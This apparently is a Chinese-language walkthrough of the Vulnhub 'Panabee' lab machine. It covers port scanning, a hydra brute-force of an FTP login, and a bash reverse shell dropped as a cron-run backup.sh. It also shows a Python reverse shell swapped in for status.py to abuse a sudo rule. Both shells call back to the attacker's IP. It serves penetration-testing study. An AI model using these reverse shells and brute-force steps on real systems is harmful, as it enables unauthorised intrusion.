Panabee
识别目标主机IP地址
(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:cd:98:c4 1 60 PCS Systemtechnik GmbH
192.168.56.228 08:00:27:2b:99:a3 1 60 PCS Systemtechnik GmbH
利用Kali Linux的netdiscover工具识别目标主机IP地址为192.168.56.228
NMAP扫描
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.228 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-22 23:21 EDT
Nmap scan report for bogon (192.168.56.228)
Host is up (0.00011s latency).
Not shown: 65529 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 dc:e1:e6:86:ba:cd:4c:1c:e8:92:c4:02:90:64:d8:ba (RSA)
| 256 00:72:c6:61:0e:34:1b:1a:b4:6c:f8:fc:b3:25:7b:6c (ECDSA)
|_ 256 16:24:5b:97:20:ad:7d:ec:c4:fc:19:a5:3d:3c:cc:13 (ED25519)
25/tcp open smtp Postfix smtpd
| ssl-cert: Subject: commonName=panabee
| Subject Alternative Name: DNS:panabee
| Not valid before: 2020-06-14T18:25:48
|_Not valid after: 2030-06-12T18:25:48
|_ssl-date: TLS randomness does not represent time
|_smtp-commands: panabee, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
MAC Address: 08:00:27:2B:99:A3 (Oracle VirtualBox virtual NIC)
Service Info: Host: panabee; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: 7h59m58s
|_nbstat: NetBIOS name: PANABEE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time:
| date: 2023-03-23T11:21:52
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.16 seconds
获得Shell
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ smbclient //192.168.56.228/note
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Jun 14 23:08:42 2020
.. D 0 Mon Jun 15 04:59:44 2020
note.txt N 265 Sun Jun 14 23:08:42 2020
20508240 blocks of size 1024. 12823536 blocks available
smb: \> get note.txt
getting file \note.txt of size 265 as note.txt (2.3 KiloBytes/sec) (average 2.3 KiloBytes/sec)
smb: \> put test.txt
putting file test.txt as \test.txt (2.3 kb/s) (average 2.3 kb/s)
smb: \> ls -alh
NT_STATUS_NO_SUCH_FILE listing \-alh
smb: \> ls
. D 0 Thu Mar 23 07:23:20 2023
.. D 0 Mon Jun 15 04:59:44 2020
test.txt A 12 Thu Mar 23 07:23:20 2023
note.txt N 265 Sun Jun 14 23:08:42 2020
20508240 blocks of size 1024. 12823528 blocks available
可以通过SMB上传文件
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ cat note.txt
Dear goper,
I'll just leave it here as a note,
Sorry for the late response,
The server will now `backup` you files in your home dir,
go ahead and backup anything you like, server will do it for you.
Please delete this note once you've read for security measure
-
goper是用户名?
-
有计划任务在执行?(定期备份文件)
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ nikto -h http://192.168.56.228
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.228
+ Target Hostname: 192.168.56.228
+ Target Port: 80
+ Start Time: 2023-03-22 23:25:23 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 2aa6, size: 5a81bc478475f, mtime: gzip
+ Allowed HTTP Methods: HEAD, GET, POST, OPTIONS
+ 7915 requests: 0 error(s) and 5 item(s) reported on remote host
+ End Time: 2023-03-22 23:25:52 (GMT-4) (29 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.41) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to [email protected]) (y/n)?
目录扫描没有什么收获,接下来用hydra来破解密码
──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ hydra -l goper -P /usr/share/wordlists/rockyou.txt ftp://192.168.56.228
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-03-22 23:38:08
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ftp://192.168.56.228:21/
[21][ftp] host: 192.168.56.228 login: goper password: spiderman
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-03-22 23:39:08
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ ftp 192.168.56.228
Connected to 192.168.56.228.
220 (vsFTPd 3.0.3)
Name (192.168.56.228:kali): goper
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||8003|)
150 Here comes the directory listing.
drwxrwxr-x 4 1000 118 4096 Jun 21 2020 .
drwxrwxr-x 4 1000 118 4096 Jun 21 2020 ..
-rw------- 1 1000 1000 4591 Jun 21 2020 .bash_history
-rw-r--r-- 1 1000 1000 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 1000 1000 3771 Feb 25 2020 .bashrc
drwx------ 2 1000 1000 4096 Jun 14 2020 .cache
drwxrwxr-x 3 1000 1000 4096 Jun 15 2020 .local
-rw-r--r-- 1 1000 1000 807 Feb 25 2020 .profile
-rw-rw-r-- 1 1000 1000 66 Jun 15 2020 .selected_editor
-rw-r--r-- 1 1000 1000 0 Jun 14 2020 .sudo_as_admin_successful
-rw------- 1 1000 1000 11134 Jun 15 2020 .viminfo
-rw-r--r-- 1 0 1000 332 Jun 15 2020 status.py
226 Directory send OK.
ftp> pwd
Remote directory: /
ftp> get status.py
local: status.py remote: status.py
229 Entering Extended Passive Mode (|||59411|)
150 Opening BINARY mode data connection for status.py (332 bytes).
100% |*********************************************************************************| 332 2.25 KiB/s 00:00 ETA
226 Transfer complete.
332 bytes received in 00:00 (2.23 KiB/s)
ftp> put test.txt
local: test.txt remote: test.txt
229 Entering Extended Passive Mode (|||13323|)
150 Ok to send data.
100% |*********************************************************************************| 12 221.10 KiB/s 00:00 ETA
226 Transfer complete.
12 bytes sent in 00:00 (8.87 KiB/s)
ftp>
似乎在goper的家目录,因此可以将ssh公钥上传到目标主机
──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kali/.ssh/id_rsa): goper
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in goper
Your public key has been saved in goper.pub
The key fingerprint is:
SHA256:3+QFgFMWB+8pvT4RzyAYwi8m6G0MyrXVJolWXxFpj4c kali@kali
The key's randomart image is:
+---[RSA 3072]----+
| . =Xo. |
| .o += + |
| .o +oo++ o |
| o+.+o+oE.=oo |
|.oo+ooo.S o.==. |
|....+ . =.oo |
| . . +. |
| .. |
| .. |
+----[SHA256]-----+
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ ls
goper goper.pub nmap_full_scan note.txt status.py test.txt
ftp> mkdir .ssh
257 "/.ssh" created
ftp> cd .ssh
250 Directory successfully changed.
ftp> put authorized_keys
local: authorized_keys remote: authorized_keys
229 Entering Extended Passive Mode (|||34675|)
150 Ok to send data.
100% |*********************************************************************************| 563 16.77 MiB/s 00:00 ETA
226 Transfer complete.
563 bytes sent in 00:00 (0.98 MiB/s)
ftp>
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ ssh -i goper [email protected]
The authenticity of host '192.168.56.228 (192.168.56.228)' can't be established.
ED25519 key fingerprint is SHA256:pA08zKKK15biAZhw/s1p7SqYmXtikdcPqTiWNiYSLwk.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.228' (ED25519) to the list of known hosts.
[email protected]: Permission denied (publickey).
但是目标并不允许基于私钥登录,这条路行不通
写一个bash脚本上传到ftp也就是goper的家目录,看能不能被自动执行
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ cat shell.sh
bash -i >& /dev/tcp/192.168.56.146/5555 0>&1
这个bash脚本名称应该是backup.sh,才回cron执行
ftp> put backup.sh
local: backup.sh remote: backup.sh
229 Entering Extended Passive Mode (|||10215|)
150 Ok to send data.
100% |*********************************************************************************| 57 869.75 KiB/s 00:00 ETA
226 Transfer complete.
57 bytes sent in 00:00 (45.43 KiB/s)
─$ sudo nc -nlvp 5555
listening on [any] 5555 ...
connect to [192.168.56.146] from (UNKNOWN) [192.168.56.228] 45726
bash: cannot set terminal process group (3520): Inappropriate ioctl for device
bash: no job control in this shell
goper@panabee:~$ pwd
pwd
/home/goper
goper@panabee:~$ ls -alh
ls -alh
total 72K
drwxrwxr-x 5 goper ftp 4.0K Mar 23 11:57 .
drwxr-xr-x 4 root root 4.0K Jun 15 2020 ..
-rwx--x--x 1 goper goper 57 Mar 23 11:57 backup.sh
-rw------- 1 goper goper 4.5K Jun 21 2020 .bash_history
-rw-r--r-- 1 goper goper 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 goper goper 3.7K Feb 25 2020 .bashrc
drwx------ 2 goper goper 4.0K Jun 14 2020 .cache
drwxrwxr-x 3 goper goper 4.0K Jun 15 2020 .local
-rw-r--r-- 1 goper goper 807 Feb 25 2020 .profile
-rw-rw-r-- 1 goper goper 66 Jun 15 2020 .selected_editor
-rw------- 1 goper goper 57 Mar 23 11:54 shell.sh
drwx------ 2 goper goper 4.0K Mar 23 11:43 .ssh
-rw-r--r-- 1 root goper 332 Jun 15 2020 status.py
-rw-r--r-- 1 goper goper 0 Jun 14 2020 .sudo_as_admin_successful
-rw------- 1 goper goper 12 Mar 23 11:40 test.txt
-rw------- 1 goper goper 11K Jun 15 2020 .viminfo
goper@panabee:~$ sudo -l
sudo -l
Matching Defaults entries for goper on panabee:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User goper may run the following commands on panabee:
(jenny) NOPASSWD: /usr/bin/python3 /home/goper/status.py
可以将原有的status.py删除,然后通过FTP上传反弹shell的python脚本,从而得到jenny的shell
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ vim status.py
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ cat status.py
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.146",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
goper@panabee:~$ rm -rf status.py
rm -rf status.py
ftp> put status.py
local: status.py remote: status.py
229 Entering Extended Passive Mode (|||26655|)
150 Ok to send data.
100% |*********************************************************************************| 232 3.35 MiB/s 00:00 ETA
226 Transfer complete.
232 bytes sent in 00:00 (167.32 KiB/s)
ftp>
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ cat status.py
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.146",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
goper@panabee:~$ sudo -u jenny /usr/bin/python3 /home/goper/status.py
sudo -u jenny /usr/bin/python3 /home/goper/status.py
/usr/bin/python3: can't open file '/home/goper/status.py': [Errno 13] Permission denied
goper@panabee:~$ chmod 777 status.py
chmod 777 status.py
goper@panabee:~$ sudo -u jenny /usr/bin/python3 /home/goper/status.py
sudo -u jenny /usr/bin/python3 /home/goper/status.py
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ sudo nc -nlvp 8888
listening on [any] 8888 ...
connect to [192.168.56.146] from (UNKNOWN) [192.168.56.228] 59108
$ id
uid=1001(jenny) gid=1001(jenny) groups=1001(jenny)
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
jenny@panabee:/home/goper$ cd /home
cd /home
jenny@panabee:/home$ ls -alh
ls -alh
total 16K
drwxr-xr-x 4 root root 4.0K Jun 15 2020 .
drwxr-xr-x 20 root root 4.0K Jun 15 2020 ..
drwxrwxr-x 5 goper ftp 4.0K Mar 23 12:08 goper
drwx------ 3 jenny jenny 4.0K Jun 15 2020 jenny
jenny@panabee:/home$ cd jenny
cd jenny
jenny@panabee:~$ ls -alh
ls -alh
total 40K
drwx------ 3 jenny jenny 4.0K Jun 15 2020 .
drwxr-xr-x 4 root root 4.0K Jun 15 2020 ..
-rw------- 1 jenny jenny 2.0K Jun 30 2020 .bash_history
-rw-r--r-- 1 jenny jenny 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 jenny jenny 3.7K Feb 25 2020 .bashrc
-rw------- 1 jenny jenny 32 Jun 15 2020 .lesshst
-rw-r--r-- 1 jenny jenny 807 Feb 25 2020 .profile
-rw-rw-r-- 1 jenny jenny 13 Jun 15 2020 status.txt
-rw-r--r-- 1 root root 213 Jun 15 2020 thanks_jenny
drwxrwxr-x 2 root jenny 4.0K Jun 30 2020 .tmux-0
从.bash_history知道有个secret.zip文件,将其下载到Kali Linux本地
但是破解失败,本靶机的提权需要利用.tmux进行
提权
cd /root
# ls -alh
ls -alh
total 80K
drwx------ 5 root root 4.0K Jun 30 2020 .
drwxr-xr-x 20 root root 4.0K Jun 15 2020 ..
-rw------- 1 root root 18K Jun 30 2020 .bash_history
-rw-r--r-- 1 root root 3.1K Dec 5 2019 .bashrc
drwx------ 2 root root 4.0K Jun 14 2020 .cache
-rw------- 1 root root 38 Jun 30 2020 .lesshst
drwxr-xr-x 3 root root 4.0K Jun 14 2020 .local
-rw-r--r-- 1 root root 161 Dec 5 2019 .profile
-rw-r--r-- 1 root root 239 Jun 15 2020 proof.txt
-rw-r--r-- 1 root root 66 Jun 15 2020 .selected_editor
drwx------ 2 root root 4.0K Jun 14 2020 .ssh
-rw------- 1 root root 13K Jun 21 2020 .viminfo
__ __ ___ ___
|__) /\ |\ | /\ |__) |__ |__
| /~~\ | \| /~~\ |__) |___ |___
标签:rw,--,goper,Jun,Panabee,2020,Vulnhub,靶机,root
From: https://www.cnblogs.com/jason-huawen/p/17247010.html